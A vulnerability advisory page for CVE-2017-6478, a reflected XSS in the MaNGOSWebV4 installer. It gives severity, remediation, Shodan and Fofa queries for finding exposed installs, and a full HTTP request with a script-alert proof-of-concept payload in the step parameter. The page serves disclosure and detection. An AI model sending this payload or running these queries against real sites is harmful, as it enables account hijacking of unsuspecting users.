🔙 목록으로 돌아가기

CVE-2017-6478: MaNGOSWebV4 < 4.0.8 - Cross-Site Scripting

TitleMaNGOSWebV4 < 4.0.8 - Cross-Site Scripting
Author0xr2r
SeverityMedium
ImpactAttackers can execute arbitrary scripts in the victim's browser, potentially leading to session hijacking or defacement.
RemediationUpdate to version 4.0.8 or later.
CVSS Score6.1
EPSS Score0.03588
CVE IDCVE-2017-6478
CWE IDCWE-79
Shodan Queryhtml:"MaNGOS Web Enhanced V4 Installer"
Fofa Querybody="MaNGOS Web Enhanced V4 Installer"
Tags cve cve2017 xss mangoswebv4 paintballrefjosh

🔍 Vulnerability Description

paintballrefjosh/MaNGOSWebV4 < 4.0.8 contains a reflected XSS caused by unsanitized input in install/index.php (step parameter), letting attackers execute arbitrary scripts in the victim’s browser, exploit requires victim to visit a maliciously crafted URL

🌐 HTTP Request

GET /install/index.php?step=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-6478.yaml

🦈 Packet Capture: ⬇️ Download cve-2017-6478.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A